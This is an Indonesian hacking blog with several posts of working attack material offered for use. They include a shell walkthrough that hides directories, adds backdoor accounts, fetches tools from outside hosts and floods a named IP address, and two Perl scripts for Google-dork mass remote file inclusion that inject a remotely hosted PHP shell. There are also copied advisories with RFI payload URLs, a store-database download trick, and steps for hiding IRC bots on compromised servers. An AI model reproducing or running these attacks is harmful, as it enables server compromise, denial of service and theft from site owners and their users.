.::. Banjarmasin Hack .::.
.::. Mari Kita Sapadingsanakan saling babagi Ilmu. Waja Sampai Ka Puting .::.
Monday, January 01, 2007
Tembak IP/DNS
Tembak IP/DNS

====================================

Cara Pertama

====================================

Contoh sasaran kita dengan IP : 202.143.48.20

# Pertama Login dulllu ke shell kamu Lalu Ketikkan Perintah dibawah ini :

gcc

w

cd /var/tmp/

ls -al

mkdir " "

wget http://www.geocities.com/finalheaven_ardi/oidentd-1.9.9.1.tar.gz

tar zxvf oidentd-1.9.9.1.tar.gz

cd oidentd-1.9.9.1/

./configure

make

make install

cd ..

ls -al

rm -rf " "

mkdir "..."

ls -al

cd ...

adduser valid

passwd valid

wget kotak-hitam.anaknaga.com/dinobebz.tar.gz

tar -zxvf dinobebz.tar.gz

cd dinobebz

./kik 'bash -i' ./bash

pico psybnc.conf

cd ..

ls -al

rm -rf dinobebz

rm -rf dinobebz.tar.gz

cd ..

adduser ekoy

passwd ekoy

cd /var/tmp/

ls -al

cd ...

wget http://www.geocities.com/finalheaven_ardi/tembak.c

gcc -o tembak tembak.c

./tembak

./tembak 202.143.48.20 3128




====================================



Cara Singkat nya



====================================



cd /var/tmp/

ls -al

cd ...

wget http://www.geocities.com/finalheaven_ardi/tembak.c


gcc -o tembak tembak.c

./tembak

./tembak XXX.XXX.XX.X 3128 <-------- ./tembak XXX.XXX.XX.X IP sasaran kita



Hingga muncul tulisan



Pasukan........ Tembaaaaaaaaaaaaaaaaaaaaak...!!!



Selesai sudah. tinggal mendengar kabar saja dari sasaran kita gimana rasanya lag .....He..he..he
posted by banjar-hack @ 10:03 PM   3 comments
Google Mass Remote File Inclussion Scanner
By : LoneEagle


Gw hanya bisa geleng - geleng kepala dengan banyaknya advisories
Remote file inclussion baik di securityfocus atau milw0rm, ga terasa
advisories security hanya layaknya mainan anak kecil yang malas
menganalisa code, terbukti dengan banyaknya advisories yang isinya
hanya google dork : "blablabla", what kind of lamme advisories!!

Ahh, gw ga peduli dengan semua itu gw cuma mo share google mass
RFI scanner dari pada nyari bug di CMS (kan uda banyak yang nyari :D)
Cara pakenya sederhana aja
1. Siapin r57shell sebagai phpshell untuk inject
2. perl lwpgoogle.pl
3. perl massinject.pl


=========================== lwpgoogle.pl ==============================


#!/usr/bin/perl
#Reference :
#http://geocities.com/iko94/
#http://www.troubleshooters.com/codecorn/littperl/perlreg.htm

-print "Grabbing website through google\n";
-print "Code By LoneEagle\n";
-print "http://kandangjamur.net\n";

-if(!$ARGV[0]){
- print "Usage #perl $0 \n";
-exit;
-}

require LWP::UserAgent;
use HTTP::Message;

$proxy='http://127.0.0.1:2221/';
$dork=$ARGV[0];
$ua = LWP::UserAgent->new;
$ua->timeout(30);
$ua->agent("MSIE/6.0 Windows");
$ua->proxy(http => $proxy) if defined($proxy);
$counter=0;
print "Pencarian menggunakan kata kunci : $dork\n";
$hasil="";
while($hasilx !~ /hasil penyajian/)
{
$googleurl="http://www.google.co.id/search?q=$dork&hl=id&lr=&start=$a&sa=N";
$grabresponse = $ua->get($googleurl);
$counter=$counter+10;
if (!($grabresponse->is_success)) {
print ($grabresponse->status_line. " Failure\n");
} else {
@hasil = $grabresponse->as_string;
$hasilx="@hasil";
sleep 1;
#print "$hasilx";
if($hasilx =~ /tak cocok/)
{
print "Ga ada hasil boz\n";
exit;
}

while($hasilx =~ m//)
{
$hasilx =~ s//$1/;
$hell = $1;
print "$hell\n";
open(f,">>google_log.txt");
print f "$hell\n";
close(f);
}
$a+=10;
}
}
print "\nSilakan liat hasilnya di google_log.txt\n";


============================ massinject.pl ===============================

#!/usr/bin/perl
#Reference :
#http://geocities.com/iko94/
#http://www.troubleshooters.com/codecorn/littperl/perlreg.htm
#http://www.tizag.com/perlT/perlarrays.php

print "Mass Remote File Inclussion\n";
print "Code By LoneEagle\n";
print "http://kandangjamur.net\n";

if(!$ARGV[0])
{
print "Usage #$0 \n";
exit;
}

require LWP::UserAgent;
use HTTP::Message;

#KONFIGURASI MASS INJECTION
#DEFINISI VULNERABILITY (TAMBAIH DEWEK YOHH!!)
$vuln="components/com_calendar.php?absolute_path=";
#$vuln="components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=";
#$vuln="components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=";
#$vuln="components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=";
#DAN LAINNYA TAMBAH NDIRI
#DEFINISI EVIL HTTP PHPSHELL
$phpshell="http://fuck.com/audit/mylocalakses/phpshell.txt?";
#AKHIR KONFIGURASI

$proxy='http://172.20.2.1:3128/';
$google_f=$ARGV[0];
$ua = LWP::UserAgent->new;
$ua->timeout(30);
$ua->agent("MSIE/6.0 Windows");
$ua->proxy(http => $proxy) if defined($proxy);

open(ff,$google_f);
@myurl=;
close(ff);

for($a=0;$a<$#myurl;$a++)
{
$myurl[$a] =~ m/(http:\/\/.*?\/)index.php/;
if($1 !~ //)
{
$gourl=$1.$vuln.$phpshell;
#$gourl=$1.$vuln.$phpshell;
#$gourl=$1.$vuln.$phpshell;
#$gourl=$1.$vuln.$phpshell;
print "Processing $gourl ...\n";
$browse = $ua->get($gourl);
if(!($browse->is_success)) {
print($browse->status_line. " Failure\n");
} elsif(($browse->is_success)) {
@hasil = $browse->as_string;
$hasilx = "@hasil";
if($hasilx =~ /http:\/\/rst.void.ru\/download\/r57shell.txt/){
print(" VULNERABLE..[OK]\n");
open(f,">>vulnlog.txt");
print f "$gourl\n";
close(f);
} else {
print "Not Vulnerable\n";
}
}
}
}

print "Finish RFI mass injecting, see result in vulnlog.txt file\n";


============================== EOF ==================
posted by banjar-hack @ 11:13 AM   1 comments
Tuesday, May 09, 2006
Bug PHP RAID
# Kurdish Security Advisory
# phpRaid Remote File Include [PHPBB/SMF] :}
# "Sosyalizim'de .srar insan olmakta .srard.r" Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org

# Script : phpRaid
# Script Website : http://www.spiffyjr.com/
# Version : phpRaid v2.9.5
" v3.0.b1

# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)

http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://files.fazar.net/cmd?&=

http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=

http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://files.fazar.net/cmd?&=

http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=

# milw0rm.com [2006-05-09]
posted by banjar-hack @ 9:31 PM   0 comments
COmersus BUg
1. search in search engine like "comersus"
2. Found a site like "http://automemories.net/store/comersus_dynamicIndex.asp"
3. insert into that site "/database/comersus.mdb"
4. Get like this http://automemories.net/database/comersus.mdb
5. Good Luck !!!

http://wholesale-pocket-bike.biz/comersus/backofficeLite/
comersus_backoffice_install10.asp
posted by banjar-hack @ 11:23 AM   0 comments
Sunday, May 07, 2006
ACal 2.2.6 = Remote File Inclusion
$*******************************************$
$ Title: ACal 2.2.6 = Remote File Inclusion $
$*******************************************$
$ URL: http://acalproj.sourceforge.net/ $
$***************************************$
$ Dork: intitle:"Login to Calendar" $
$***********************************$
$ Credits: PiNGuX $
$*****************$
$ Greetz : [0o] $
$***************$

Exploit:
http://[url]/[calendar_path]/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]
posted by banjar-hack @ 6:58 PM   0 comments
Saturday, May 06, 2006
Making Bot For IRC
Tutorial for making bot
1. find the directory with "find / -type d -perm -2 -ls"
2. wget http://oerwal.freecoolsite.com/robot.tar.gz
lwp-download http://oerwal.freecoolsite.com/robot.tar.gz
curl -O http://oerwal.freecoolsite.com/robot.tar.gz
3. "tar -zxvf robot.tar.gz"
4. Go to "nenen" directory
5. Type "./evie"
6. Type "./evie a.txt Nick_Bot ident_bot IP_Host Chanel Owner"
7. find PID "ps -aux"
8. ./crotz "/usr/local/apache/bin/httpd -DSSL" ./eggdrop -m a.txt
9. The NickBot Will Join To chanel
10. Pv The Nick Bot
11 Type "pass password"
12. login dengan mengetikkan "login password"
13."rehash" to restart bot
14. Upload tcl bot to nenen/scripts
15. Back to "nenen"
16. Type "./tcl -t a.txt load.tcl"
17. good Luck!


cat /etc/hosts ----> gasan melihat ip hosts
posted by banjar-hack @ 4:44 PM   0 comments
TotalCalendar v2.30 Bug
Vendor: SweetPHP
URL: http://sweetphp.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by TotalCalendar"
-----------------------------------------------------------------

Exploitation:

/index.php?inc_dir=http://www.yourspace.com/yourscript.php?
/index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF

# milw0rm.com [2006-05-05]
posted by banjar-hack @ 1:59 PM   0 comments
Sunday, April 23, 2006
Hidden Status Bar!!!
usually, if we make a link, ex. data.html,
so the link will show at status bar.(www.site.com/data.html).
If we want the link hidden.
just change the link with image --->
< input type="image" onclick="location.href='dataku.htm'" src="linkku.gif">


So.. good Luck!!!
posted by banjar-hack @ 8:20 PM   0 comments
Saturday, April 22, 2006
Bug TotalCalendar
Ok.This.article.is.about.bug.of.TotalCalendar.This.Is.New.Bug. Oke This The Tutorial.

1. Open yours Search Engine
2. Now Type the Keyword = ""powered by totalcalendar". U can use u'r keyword
3. Now U can chose the site!
example : http://victims/calendar/index.php?action=SwitchCal&selectedCal=1

4. change The url :
ex : http://victims/calendar/about.php?inc_dir=http://files.fazar.net/cmd?&=
5. Enjoy with ur commands

tcal/about.php?inc_dir=http://files.fazar.net/sodoker?
modules/TotalCalendar/about.php?inc_dir=http://files.fazar.net/cmd?&=
/modules/EventsCalendar/about.php?inc_dir=http://files.fazar.net/cmd?&=
posted by banjar-hack @ 2:40 AM   1 comments
Sunday, October 23, 2005
Cara Buat BOt di PUTU.NET
1. cd /var/tmp;wget geocities.com/eggdrop616/surya.tar.gz

2. cd /var/tmp;tar -zxvf surya.tar.gz

3. cd /var/tmp;cd .dat;rm chanary.conf

4. cd /var/tmp;cd .dat;wget geocities.com/eggdrop616/chanary.tgz

6. cd /var/tmp;cd .dat;mv chanary.tgz chanary.conf

7. cd /var/tmp;cd .dat;cd scripts;rm ary.tcl

8. cd /var/tmp;cd .dat;cd scripts;wget geocities.com/eggdrop616/ary.tgz

9. cd /var/tmp;cd .dat;cd scripts;mv ary.tgz ary.tcl

10. cd /var/tmp;cd .dat;./nadya a.txt nickbot ident Ip channel owner

11. cd /var/tmp;cd .dat;./dssl a.txt

12. nungguin bot masuk trus pv pass passkamu

13. pv lagi ketik login passkamu
posted by banjar-hack @ 2:23 AM   4 comments
 
The Time

Previous Post
Archives
it's You?




Links
SecurityDownload
  • -
  • -
  • -
  • -
Powered by

Isnaini Dot Com

BLOGGER
© Oerang-Walla